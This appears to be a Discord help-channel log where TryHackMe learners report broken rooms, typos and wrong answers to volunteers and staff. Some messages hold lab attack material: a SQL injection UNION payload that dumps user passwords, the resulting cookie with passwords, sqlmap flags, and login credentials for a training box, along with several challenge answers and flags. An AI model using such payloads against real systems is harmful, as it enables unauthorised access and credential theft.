I just wish we had a disclaimer at the top of Muiri rooms so I could read all the text in a Scottish accent. But that suggestion hasn't been implemented yet 
It is less common in modern usage, but not regional. It is perfectly fine in US English, British English, and General English.
Hello i'm trying to solve Windows PrivEsc but when connecting using RDP its not connected
I have tried on Both linux and windows and no connection
Are you connected through the openvpn?
yes
Not a bug but the room channel hasn't been made yet and most of the time, room spelling errors come here :) @wheat fractal
Oh okay.
Typos in rooms go here too
I cant submit answer in Task 6 question 3 at MITRE room.
I'm trying to submit correct answer and always receiving errors.
For the second name you find, what tool is it a part of?
I've added this as a Hint to Task 6 Question 3.
Hiya folks, not sure if this has been mentioned before, but I'm working through the OWASP Top 10 room and Task20 makes use of a XSS playground web app that's super laggy. The page doesn't seem to load completely and navigating to the stored-xss page won't load a comments section so the stored-xss tasks can't be completed.
Hello guys, i'm doing the https://tryhackme.com/room/uploadvulns and i've done the steps for setting the /etc/hosts but in my attacker box i can't load the sites with uploadvulns.thm; however with a command like firefox http://overwrite.uploadvulns.thm it seems to work but i can't access the demo one. I have added it in the /etc/hosts file too. Is it normal with the attacker box ( with firefox on kali it won't load and with command line it works for 2/3 only). I have also tried with openvpn and the /etc/hosts of my windows computer it won't find the pages. Is the room bugged or am i doing something wrong ? (I followed the recommendations in the room to the point) Thank you in advance
It doesn't work on my kali vm either
Pretty sure the room explicitly says that demo.uploadvulns.thm doesn't exist and not to navigate to it
dang i'm stupid. Sorry. My bad. Thanks. I should stop doing those in parallel my classes I seem to become stubborn !
Np
Can you make that bold as well?
Aye
And 100x bigger?
I repent for my stupidity.
I carefully read it
And acknowledged, nodded
And immediately forgot 🤣
I do that all the time tbh
Room: https://tryhackme.com/room/thecodcaper
Task 6
Bug: LinEnum is written in 2 ways.
Same room
Task 7
Bug: shouldn't it be "than" instead of "then"?
There is bug in /introtoresearch : https://cdn.discordapp.com/attachments/830209597553639434/840684761986760714/unknown.png
seems fuelCMS in the db has changed to "fuel CMS"
Fixed
hello
[01:07]
touch noot.txt
[01:07]
./shiba1
[01:08]
bash: ./shiba1: No such file or directory
[01:08]
pwd = /root
[01:09]
root@ip-10-10xxxxxx:~# find shiba
find: ‘shiba’: No such file or directory
In room linuxprivesc, the 'locate' command fails because the locatedb is out of date.
You are not on the correct machine. You're using the attackbox atm.
hey guys, I am doing a recording of room blaster. but I found there is no browser history in that IE browser
Known issue. Dark marked it as WontFix.
Only the creator can do that, dark is quite busy.
https://tryhackme.com/room/jupyter101
Task 2 - The supporting material link sends you to https://oldblog.cmnatic.co.uk/posts/thm-room-jupyter101-support-material/ which is a 404 page
@livid rose not a bug, you have the wrong machine deployed
(i lol'd at myself) thank you!
Gave +1 Rep to @eternal summit
Thanks fixing (:
oof I don't think I have a backup of that from when I started
I'm in the https://tryhackme.com/room/webenumerationv2 atm, ("There's a flag out there that can be found by directory scanning! Find it!") copy pasted the flag without the first letter and it got accepted...
¯\_(ツ)_/¯
@obtuse musk that will be the answer tolerance :)
LOL
not really a bug but this room: https://tryhackme.com/room/csp, task 3
http is bolded to bring attention to the fact it's using a different protocol, so subdomain. and .org should also be bolded imo
Alfred room, Task 1 there is a bug with the first question
without filling in a answer it accepts it
Reload the page @wheat fractal
ahw check, that worked! @placid abyss . Thanks
Gave +1 Rep to @placid abyss
Hi Guys,
I'm not sure if it is a Bug, but in my opinion it is. I'm in the Beginner Path in Network Services at Task 6 . The question six is " Based on the title returned to us, what do we think this port could be used for?" And the "correct" answer is " S Backdoor", but i think here is the Bug. The correct answer should be "Skidy's Backdoor". It looks like here is the problem with the missing " Skidy' " (hopefully it is understandable what i mean, english is not my native language)
Cheers
SG
Sorry if i see it correctly this belongs to the bugs room here, sorry.
Refresh the page. I think the correct answer is just "backdoor"
ok but the Field in the answer section is also * ******
and it accepted S Backdoor , but i know what you mean and make sense to me
the answer fields allow for a certain amount of error. If you refresh the page, it should show the true/correct answer
ok thanks
you're welcome
Hello, I have a problem with the first task file from the John the Ripper room. I think it is corrupted because I cannot open it, other task files from the room seem to work. I tried to cat the contents and it's totally not readable. Does anybody have the contents of the task file at hand and can send it to me?
What's the file called? @wheat fractal
There's a bug with THM atm where the file names are removed and you get just the extension
when I download it it's called zip
but the others in the room are downloaded with the name 'txt'
and they work
Yeah. So rename it to file.zip
ok, thanks!
Gotta start somewhere
A txt (Or commonly a filename ending with .txt) is generally a txt file - Which means its readable - Like a book.
A zip (Or commonly a filename ending with .zip) is generally a compressed file - Which means its got all the data squished together in a form you wont be able to read - So you need to unzip it. Other compressed (Or archived) extensions are commonly .rar, .tar, .7z, .gz
When you're more experienced you'll be able to use the file header to see what type of file it is, even with no extension
I've forwarded the Task File name issue.
Hi. The answer to the first question in https://www.tryhackme.com/room/dailybugle is spelled differently (without -) in the answer than on the machine
Refresh your page and check again?
https://tryhackme.com/room/httpindetail Task 7, first question: answer expected has 23 characters, given flag has 21 characters, thus, the flag given is not correct
Hey @coral barn that's a private room :)
As private rooms aren't accessed by the majority of people, the bugs are up to the room creator to change.
It looks like the room hasn't been released so it's not as important yet
Ok, I understand. Thank you for the response @hazy tiger
Gave +1 Rep to @hazy tiger
Yes, after refreshing it is spelled in one word. I spelled it with a space, which the page accepted, but on the server its consequently spelled with "-" and that is not accepted by the THM page
Same problem here
how did you access a private room and see its tasks?
The Correct answer is not accepting in https://tryhackme.com/room/httpindetail - Task 7 - Questions 1
I have the same bug
the room isn't released publicly yet, how did you all get the room code?
Probably in a learning path
From here to be specific.
(would like to point out that Detail has a capital in DNS but lowercase in HTTP)
there seems to be a bug with the Ice room when trying to exploit the machine. Several people have posted it on the thm forum and no one seems to have a solution. The exploit is supposed to create a session, but never does after completing the exploit.
The room hasn't changed, and it works for the majority of people. Usually, the issue is that people have incorrect options.
Not really a bug, just a graphical issue. The new DNS in detail room- tasks 2 and 3, have a background color specified for the text, which looks odd with dark mode plugins. The other tasks look fine.
Hey yo, In the new room : httpindetail, a flag isnt working i think. Task :Make a GET request to /room
it says that the flag is wrong
The flag for Task 7 Question 1 doesn't seem to work
The flag it gives is typo'd (Missed an E)
... Aaah - You beat me :p
We're aware of the discrepancy for the HTTP in Detail room for Task 7, Question 1.
THM{YOUR_ARE_IN_THE_ROOM} this doesn't work
Yeah.
But grammatically it should be you're
I wasn't arguing with the flag not working.
Not really a bug per se, but the new httpindetail room doesn't mention a key distinction between put and post, which is idempotence.
also, task 4 background colors are hard to read with dark mode plugins.
Hey guys, the "Sysinternals" doesn't work for me. I can't make \\live.sysinternals.com\tools\<toolname> working. I'm following all the steps like getting the service Webclient Running, Install-WindowsFeature WebDAV-Redirector -Restart but it seems like I can't turn on the Network Discovery. When I turn it on and save, it looks like it goes back to "off" for my profile.
When I then try again "\\live.sysinternals.com\tools\procmon.exe" it says "cannot find network path" like I don't have any network connection. I "RDP" the machine to access .
In the "Cutting out the noice" part of the "Sysmon" room there is a "4" missing in this command "Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=444'" (the text before says 4444 not 444)
A bit later in the same room in the "Hunting Metasploit" there again is an inconsistency with 444 and 4444
Hey, in room osquery, Under Creating Queries Task, the question was asking where the username length is 3 was not showed in the answer
Also in the next task. I think we need to run sudo with
Hello, I'm doing the splunk room. The splunk machine doesn't start. I tried several times and waited more than 5 minutes.
how did you get dark mode?
Web Fundamentals: Task 3, Question 1 accepts an incorrect answer
Please elaborate
It accepts "pos"
Ah right
Refresh the page. It's just answer tolerance
Fixed. Thank you for reporting.
Gave +1 Rep to @raven linden
Fixed those as well.
why am i getting "connection timed out " in almost all rooms
Probably because you are not connected to the VPN
Hey, on the room https://tryhackme.com/room/introtonetworking, the question "Which city is the registrant based in?" in task 7 has changed
I don't think it has. Make sure you change domain when the room tells you to.
The city is asking for the city associated with microsoft.com not facebook
ho ok, I missed the previous question, my bad
There is a problem in the following room:
https://tryhackme.com/room/webosint
Task 2.5 - What country is listed for the registrant?
https://rdap.namecheap.com/domain/REPUBLICOFKOFFEE.COM
Using this link, we can see that the registrant's country code is IS.
However, iceland does not work in response.
After reading the writeup, the expected answer is panama! I think there is a problem, either in the domain name or in the expected answer.
Iceland?
Yes sorry ! Iceland. I have modified my report
I think this has been reported and the room creator said something about it, hold on a sec
Certainly been reported a few times
https://tryhackme.com/room/wreath, task 9
to -> on
https://tryhackme.com/room/wreath, task 9
i think this question could be worded like DNS servers or DNS resolvers rather than entries since DNS entries typically refer to DNS records (A, AAAA etc.) which would be your /etc/hosts
Heyo, I think there's an error/typo in the John the Ripper room in the beginner path. It seems to swap P and NP in the explanation https://i.imgur.com/NkYme3x.png so they have the backwards meaning
<@&568449888682246145> Vulnversity room is not loading!!! Trying from yesterday
Please do not ping the admins.
is the metasploit room loading for anyone?
Oh k sorry!
How to resolve that issue??
Is there something wrong with attacktive directory?
maybe doesn't work with the latest impacket?
secretsdump.py DRSUAPI fails
I'd recommend asking in #room-help
It's not going to be bug with the room, but perhaps some of the tools have changed.
In the volatility room it says "On Debian-based systems such as Kali this can be done via 'apt-get install volatility'" but kali has dropped volatility repos and you won't be able to apt-get it without adding repos.
@heavy spade
np
@dusky junco can I text you in private?
so in buffer overflow prep, instructions say to run exploit.py with python3 but it only works with python,,, ???
Hello everyone
Any news on Rust room?
Room doesn't work more than 2 weeks
Can anyone please reach out to "bee" user regarding this?
It's a site issue not a room issue
hi, I just finished the Overpass 3 room and the first flag should be own by apache but it's a root flag is it normal ?
It is world readable. Not a bug.
https://tryhackme.com/room/howwebsiteswork, task 1
needs a comma after website
task 2 should also probably have the highlighted text in a code block thingy like the rest
Fixed. Thank you for reporting Jake.
Gave +1 Rep to @sonic willow
but the hint was that it belong to apache and there it belong to root right ?
ok my misunderstanding
tiny proofreading thing - in https://tryhackme.com/room/introtonetworking , I think the following were meant to make ".com" and ".co.uk" bold, but the formatting failed: "if you were searching for tryhackme**.com** ... If you were searching for bbc**.co.uk**
Ta. We briefly changed to a markdown editor before Christmas and a bunch of the formatting went nuts when we switched back. Fixing now
Is the Vulnversity room down by any chance?
I just cannot access it.
Whereas other rooms and machines are responding well, why and what is the reason Vulnversity isn't accessible to be?
me*
Rooms can't be down
It's a site bug atm
Admins are aware. They're working on it.
In the Blaster room, the first question in Task 3 doesn't seem to be answerable anymore (at least not in the way shown in the official walkthrough) as Internet Explorer is set to delete its history after 20 days
hello everyone. I am just working on "Internal". The internal wordpress site does not work properly. Many links are down and logging in is not possible. I also tried it with the provided AttackBox, same result.
@craggy swift I would put money on you not adding it to your hosts file, in which case it's not a bug. That's just how WordPress responds to being accessed from the wrong domain
Ok, but then maybe the hint should be changed. It is quite misleading saying "Sometimes looking at the history in a user's web browser can be very insightful"
Again. Closed as wontfix.
Ah, quite disappointing. Is this a general strategy in THM? Just ignoring bugs?
No.
It's an incredibly small issue in a challenge room that's worked around very easily.
Yes, I agree that the issue itself is small but the hint is explicitly misleading. I just have to decide if I still want to waste money on THM, if this is the reaction I get when pointing out bugs.
Remember that many rooms are created by community members
Also remember that the discord is not official support.
Yes, I mainly am dissatisfied with your answers. If the answer would have been: "We know it is broken, but it won't be fixed, because it isn't worth the effort" that might have been fine. But I clearly got the message, that I shouldn't point out bugs, that can be worked around
I'm not official support either.
You're free to be dissatisfied with my answers because I'm under no obligation to provide satisfactory answers, as a volunteer.
You should point out bugs. You just cannot expect every single thing to be fixed. Room creators are often working or studying full time in addition to creating rooms.
I have full understanding for that. I just got in doubt if I should point out bugs. Thank you for the explanations
Yes, please do. User feedback is really important to TryHackMe.
Thank you. And sorry for me sounding irritated above. I appreciate all the work you (both staff and volunteers) do to provide interesting challenges :)
Gave +1 Rep to @glad badger
https://tryhackme.com/room/relevant the webserver is not accessible from this room....although SMB share is working
I think you need to add it to /etc/hosts?
Can you provide a little more detail than "not working"?
!docs verify
Follow these steps so that you can post screenshots
I have shared the image as i was unable to copy paste here
Yeah. Follow those steps to verify and then you will be able to post images.
Not all boxes have web servers. But try it without the https, just http
Also a portscan
i cant solve one question of attacking kerberos....i mean i solved it but it says not correct....i checked write ups,blogs,videos the ans is correct but its not accepting it
Please do not spam the same thing over multiple channels.
Please provide more context to your statement.
got stuck with scan itself...any reasons for ports being filtered..thx.. https://tryhackme.com/room/relevant
Yeah. Fix your VPN.
is it because i am getting connected through mobile hotspot???
IDK, I just know your VPN probably isn't correctly functional
I recommend going to #site-support
thx a lot
I think this may be a bug - doesn't require answer. XXE: Task 5.
It's a question to get you to think about it
This room is stuck on loading.
oh okay, got it
thank you @tall nexus for the Linux Strength Training room, fun way of drilling in things I've had to look up for years every time I needed to use them
Gave +1 Rep to @tall nexus
very minor thing: Task 4 question 2, the [MACHINE:IP] markup doesn't auto-replace (I'm not dreaming, it does that in other rooms, right ?)
MACHINE:IP sounds like a typo
MACHINE_IP should autoreplace but I've seen it being a bit weird around special characters
Kenobi has a few instances that don't auto-replace, but I don't think they were designed to
This one got me too- syntax is everything! What I learned here is unless you are running as root for everything on your system, you will run into permission issues like this one unless you use sudo or switch to root to run the command. Also adding the '-debug' flag at the end of command lines can really help you sort out the problem.
yup after i posted I found the same thing
Great! it's a crazy world we live in when chasing syntax errors can take hours or days! But what choice we have- quit? Never!!
Hey folks, anyone could explain me the points system!? I read about them, but I'm a bit confused when a I see the following....
On Pickle Rick room...
This is 799 days old, but there is a guys that made this room the last 25th of April and received 80 points per answer, there are other guys that made the room at the same day but received 30 points per some answers and finally I received only 30 points per answer on my all answers.
So, could any one explain me why this differences!? I guessed that this room is so old, that all of us would receive 30 points, or am I wrong!?
Thanks in advance!
It's a challenge room so whoever answered it first got an increased point value
Thanks!! but is it work even with old challenge rooms!? I guessed that happened with newest rooms that were released in the same month. Or am I wrong!?
Gave +1 Rep to @viral cobalt
https://tryhackme.com/room/rust
this room is not opening
stuck on the loading screen
You are wrong. The points persist. The first person to answer a question in a challenge room that has blood points enabled is awarded an extra 50 points. These points do not go away after time.
Is the room Daily Bugle down. I tried pinging and not getting any response also. Tried restarting the machine 2 times but the problem persists.
Anyone, any idea?
Rooms cannot be down as the VMs are not shared
Usually, this means a VPN issue.
I would recommend heading to #site-support
Ok thanks @eternal summit
Gave +1 Rep to @eternal summit
PSEXEC works on vulnnet roasted when not a subscriber, but does not work when you are one. Not sure what the issue is, but a non subscriber told me psexec is working every time, but for me as a subscriber it's not working at all. Command syntax is the same, and scenario is identical.
in the https://tryhackme.com/room/investigatingwindows the question "At what date did the compromise take place?" asks for a format of "Answer format: MM/DD/YY" but it won't work unless you give it a format of MM/DD/YYYY
the answer is ||03/02/2019|| if anyone wants to confirm
Fixed. Thank you for reporting.
Gave +1 Rep to @misty cave
Task 7 On the OWASP juice shop is not working for me. I am getting the pop up to hit okay, but afterwards I am not getting the flag. Has anyone else encountered this? It is not even letting me select them being completed on score-board page.
Good evening, Yara room Task 11 last question hint has a typo in the hint which could lead to some frustration
it should be thor-webshells.yar and not thor-webshell.yar
Just wanted to share to possibly help anyone else going through the room and trying to use "locate" to find the file lol
Heyo, I found an extra space in the code for the sqlilabp3 room.
Under task 7 after the automated script.
https://tryhackme.com/room/sqlilab
P5 informational thank you. o3o
-p username --dbms sqlite --technique=U --no-cast
there is a minor bug in https://tryhackme.com/room/owasptop10 , task 14 [Severity 4] XML External Entity - DTD ,
in second to last line: !ELEMENT body - Defines the body element to be of type "#PCDATA"
element is highlighted but body should be as in the case of the preceding 3 lines
Need to update on: https://tryhackme.com/room/wireshark
Old: RSA key navigate to Edit > Preferences > Protocols > SSL > [+], you will need to fill in the various sections
Needs to update SSL to TLS. SSL isn't listed in current version of Wireshark anymore.
Room : https://tryhackme.com/room/rpwebscanning
Task 2 : Question 6
Nikto spelling is wrong.
just typo but should be fixed looks awkward to me
For Internal room (https://tryhackme.com/room/internal), I'm not sure if this is considered a bug... but when trying to crack the password for Jenkins, my hydra in attackbox is yielding different results from my own kali vm connected through openvpn.
Attackbox keeps returning superman as the password while my own kali vm gives the correct password.
In https://tryhackme.com/room/attacktivedirectory task 6, i assume there is a missing which
https://tryhackme.com/room/rrootme this CTF constantly hangs or times out
the whole room is going to be redone at some point
it's on my to-do list
Fixed. Thank you for reporting.
Gave +1 Rep to @rustic snow
why invalid user ?
Fixed. Thank you for reporting.
Gave +1 Rep to @strong kelp
Hey, I have a question regarding a badge that I should already have since I finished all the required rooms but it isn't available yet.
which badge
WorldWideWeb (the newest one)
you should be able to get that one, you may need to reset the "Putting It Together" room and complete, there was a bug on the badge originally when it was released
Oh ok that would explain things because I finished those when they came out.
Thx, it worked. Got it now.
OWASP10-A8-CMNatic has a bug I think in the https://tryhackme.com/room/owasptop10 room...
I would expect that the admin flag (2nd flag) isn't accessible before changing the cookie info, but it is. Tested it even by resetting the machine, and creating a new account and just visiting the admin url.
Guess he coded it with VIM and that made it that an error slipped in perhaps 
Thanks for reporting, I'll review the source code this weekend (:
Gave +1 Rep to @orchid crag
I'm HOPING this is a bug - The cmess room has ||the cronjob running every 2 hours instead of every 2 minutes||
Realistic? Sure.
Good for a CTF room? Not so much.
You'd be wrong to think that, the cron runs every 2 minutes as shown by the file that it outputs being updated every 2 minutes
*/2 * * * * which is listed in /etc/crontab
¯\_(ツ)_/¯
Click hours and look which it highlights
You done?
Hmm - Weird - First time I did it, it did hours
You'd be the first to have that issue as the room's been out for over a year and this is the first time I've heard that issue
In the room network services, task 2, created by PoloMints, I'm not sure this sentence is correct :
What do you think is wrong with it?
My first language isn't english but it seems the sentence isn't correct, I understood it as :
What do clients use to connect to servers
yeah, that's how it reads to a native english speaker
Ok then, TIL ! Thanks
https://any.run/report/c378387344e0a552dc065de6bfa607fd26e0b5c569751c79fbf9c6f2e91c9807/3363fde4-111b-4aaa-b73d-e4144433c284
https://tryhackme.com/room/malresearching
Task 4, analysing an any.run report
The report returns a service error
This room: https://tryhackme.com/room/attacktivedirectory has no "footer" content below Task 8. Tested on two different machines/browsers (chrome and FF)
Also, a lot of the text in this room doesn't play well with dark reader: https://tryhackme.com/room/attackingkerberos (I know that's not really a site bug, just throwing it out there in case it's a quick/easy fix like I think/hope it is)
anyone know if its possible to solve https://tryhackme.com/room/csp
task 7, attack 5 and 6, when the room's VM doesnt have internet access?
I think the answer should be wrong. First of all, it's spelled wrong. Second of all. It was the first that came up in my mind while I'm sure that it would be called something different like ...side XD EDIT: Redacted for spoilers....
So no idea how it accepted my wrong typing as the correct answer.
THM has some answer tolerance. Picture having to type out a 64 character long flag manually and missing 1-2 letters or mistyping those.
Yeah good call... XD I didn't assume it would have a tolerance for answers.
In the MAL: Researching room it tells me this:
However the question says 6 million
Not 6 billion
It is actually 6 billion, I clicked on the link in the text.
Another potential issue with that room
I'm trying to RDP into the box, I have my openvpn on, I've checked and double checked that the creds are right, but it's saying the username or password is incorrect
Never mind, RDP working now
I'm hoping this is the correct place to post this-
I'm currently on Task 5 (Remote Code Execution) in the Upload Vulnerabilities Room, and when I try to connect to shell.uploadvulns.thm, I get a 503 error
I can ping the IP of the target room and receive a response, but when I try to run GoBuster, for example, it can't reach the URL
probably something you're doing wrong, that room has been pretty well tested.
Oh darn I terminated the room and don't think I re-entered the echo command listed at the top of the room when I restarted... will try that. My bad
Make sure when you edit your hosts file that you don't have duplicate entries
Gotcha. Entered that echo command and problem fixed. Not enough coffee for me today
ustoun box is literally unplayable , sql server is not running 95% of time , and when its running it dies after running 2 commands
I hope this is where I should post this. Ping me if I need to post this somewhere else. I'm pretty new to THM.
Title: nfs2 - Task: 4
Room answer says bash file permissions should be ||-rwsr-sr-x ||. The default file from the github link has permissions || -rw-r--r-- ||. No big deal, chmod to set perms to || -rwsr-sr-x || but when you continue through the room and try to run ./bash -p on the target machine it errors with permission denied.
I was able to continue past the task by setting file permissions to || -rwsrwsrwx ||.
The room says "Make sure that it ends with || -sr-x ||" so I assumed my initial chmod should have worked. Maybe I misread some information in the room but maybe someone more knowledgeable can double check this and make sure there's not an issue with the room.
Just guessing here, but it might have been owned by the wrong user
The task told me to do "sudo chown root bash" which I did and verified with ls -la bash. I don't think that's the issue but I'm so green I'm not going to say you're wrong lol. It's entirely possible I did something wrong. I don't think I did but idk
The Blue room is seriously buggy... I had to restart the machine like 5 times already before it finally succeeded. Then the exploit with meterpreter failed, so had to reboot again, had to reboot the machine itself another 2 times before the blue exploit worked again. Then when finally having meterpreter flag2 is missing...
Is it possible to solve some of these bugs in some way or another? As this is just not really helping the education. All it teaches me is that the Blue exploit will fail to run 4 out of 5 times, and is unstable like hell. Spend about 3 hours already on the room because of all the issues with the VM.
It's not the machine, it's the exploit.
The exploit is unstable and screwing it up can crash the whole room. It teaches you that you should be more careful and not all exploits work every time.
Yeah okay... That is what I indeed learned that the exploit is unstable... Would have loved if it was learned in another way though XD Got really tired of having to reboot the machine and waiting a full minute every time.
!dark
dammit
Possible bug for room 'Blaster'
||Internet Explorer history doesn't show the site visited for the CVE||
I tried respawning and still see the same issue
Known bug. Dark doesn't wanna fix
I replaced the VM to include the CVE a while ago but it looks like IE clears the history after x amount of days
If I still have the OVA I'll re-upload
Found them & the creds. I'll re-upload tonight @boreal grotto @obsidian kiln
VM replaced & made live -- just testing
Fully tested & made live thanks for reporting @boreal grotto
Gave +1 Rep to @boreal grotto
cc @heavy spade
Thanks @dusky junco
I've changed it to v3
Working on Metasploit room, it needs an update on Task #7, second question
@heavy spade socks4a does not exist
There's no task that tells you to use socks4 as far as I can -- I updated it to include socks5 a while ago @rapid dagger unless i'm missing something?
http://tryhackme.com/room/rpmetasploit aye?
Can confirm, that seems to be the public room
for these "wont fix" issues, is it at least posted in the known issues for the room?
No. There are very very few people who can add issues there, unfortunately
So not even site admins like Dark and Skidy can do that? That's disappointing
seems like that would save some headaches for everyone
Oh, Skidy can definitely do it, but I suspect it's a "go into the DB job"
Given his account, afaik, just has all of the perms. If it's not in the manage rooms perm (which it isn't) then I doubt it's anywhere else
I maintain it should be given to room testers
My bad. It is socks5, but either way, the server does not have socks5 either
For some reason is not allowing me to add a screenshot
!docs verify
Follow those steps, then you can post images
It's going to be part of a Room Maintenance process, which has not been finalized.
https://tryhackme.com/room/osqueryf8 there's a couple of potential issues with Task 4. The number of tables for this version of Osquery seems to come from 4.6.0, (which matches the version on the vm), but the details before the question are all talking about version 4.7.0.
Then there's a couple of "how many tables is compatible with xyz" questions, which i think should be "are compatible", but i do kinda feel picky going for grammar.
-undelete
Up to 10 last deleted messages (last hour or 12 hours for premium):
none...
thonk
https://tryhackme.com/room/zthobscurewebvulns This room's first challenge isn't loading up a website for me.
ZTH: Obscure Web Vulns, Task 2 grammatical mistake: "their may be" rather than "there may be"
Also, on Task 3, it doesn't explain what exactly the vulnerable code is
Room: https://tryhackme.com/room/historyofmalware
Task: 3
Error: Image on the right side is not displaying (after clicking "view image" i am getting 403 )
Gave +1 Rep to @soft terrace
How do I download task files in Attackbox?
:(
The only real way to do it is to sign in to THM from the attackbox which free users can't do
Gosh, it bugs so hard
I'll record my screen
I think the questions are related to the version in the VM. The grammar issue is now fixed.
Task 6? Click the Start Machine green button. Works for me.
Grammar fixed.
hi all! Not sure if what I've done for pickle rick's third ingredient is intended or not... On the other hand I'm afraid to spoil it. Is there anyone I can DM or shall I just say it here ?
Have you checked the writeups?
I haven't, in case what I've done is unintended. I'd still like to try to figure out the 3rd ingredient on my own if that's the case
hah, indeed intended, and what I thought was real turned out to be a literal rabbit hole, good fun
it seems to be an intermittent bug where the room would glitch out and complain about your time being almost up on the machine you spin up. Also it says it's been terminated and can't find it anywhere, but when you refresh the web page it's back
maybe some kind of cookie issue idk
It's a known issue :)
Oh ok in that case all good then, at least it doesn't really break anything
says time expiring soon even if I add one extra hour
Also probably part of the issue. If you refresh the page and the time on top is still right then no problems really
https://tryhackme.com/room/sqlilab - Task 5
The injected value is not reflected where it should.
When using ||' UNION SELECT 1,group_concat(password) FROM users-- -|| the result should be displayed in challenge2_username but instead it is in challenge1_userobj and challenge1_username contains Unkown.
I obtained the following cookie ||b'{"challenge1_user_id":1,"challenge1_username":"Unkown","challenge1_userobj":[[1,"rcLYWHCxeGUsA9tH3GNV,asd,Summer2019!,345m3io4hj3,viking123"]]}'|| and the flag is missing from the password list.
Here what's expected from the course material:
@outer sonnet
I tried resetting the VM and have always the same behavior.
sqlilabp3 suggests it's the 3rd version of the VM
I am solving the cmess room. I have found the correct credentials (andre@cmess.thm:KPFTN_f2yxe% ) for gil cms login panel but it still gives me error wrong email or password. Room link https://tryhackme.com/room/cmess
is this a bug ?
I have verified the creds with several writeups
Hiya!
I'm doing the burp suite room .com/rpburpsuite atm and at Task 9 there's a link to another (older) burpsuite room .com/learnburp.
That room has been made private by the owner.
Still I'd like to get more experience with Burp's Intruder. Is there another room that can substitute?
Juice shop, upload vulns. Both rooms use burp suite to some extent, they're not solely around burp suite but you do learn some new tricks.
I would highly recommend Upload Vulns because it is really useful to know.
Indeed. Burp suite is a great tool for doing any Web based exploitation due to seeing the request and its output. You can manipulate stuff so much its great.
The real value though is in the additional software/capabilities that you can have with Burpsuite. Some of them are really handy/powerful even though they use somewhat the same capabilities of the default/free edition.
ZAP is pretty decent as well
hi all, reporting a bug in the Hacking with Powershell room (https://tryhackme.com/room/powershell), Task 3 Question 1. Asks you to find "interesting-file.txt", but it's currently actually "interesting-file.txt.txt"
same for the .bak file in task 4 question 10, it's actually a .bak.txt 
That's Windows being dumb unfortunately
@glad badger could you add it to the fix list?
I'd like to argue with this assessment
What is demonstrated there is what happens when "Hide extensions for known file types" is enabled and people don't save things correctly
Okay, that's the technical answer
So, to put it in a rather more insulting, but more accurate way, that's the box creator being dumb unfortunately
Does it find the file when you do -contains interesting-file.txt instead -eq interesting-file.txt?
Hello there, I'm having trouble reaching the Metasploit room (other rooms load just fine) : could anyone try access it, just to know if it's just me plz ?
PS : my ultimate engineer technique (log-off/log-in) is not working here
OK room is up again, just ignore me
This is so annoying :(
Hi, the room 'vulnversity' won't load. ? any help please ?
hi, not loading
https://tryhackme.com/room/rpmetasploit
Still not working
still not working as well
Hi, for the room Corp, I'm having trouble following the tutorial to do kerberoasting. When I try to download the powershell script, it keeps throwing remote server unreachable.
The machine doesn't have internet access
is there an ETA for the fix?
No
A fixed planned for #room-bugs message ?
why does retro not give me any options to open the link
Not a bug, it's intentional
I already tried opening chrome and ie when I clicked it and still didn't work
Ok. It's not a bug, it's intentional.
sorry for the delay! As a matter of fact -contains also needs a full match, it's meant for searching in collections apparently. -match does the trick though, as does -like if paired with wildcards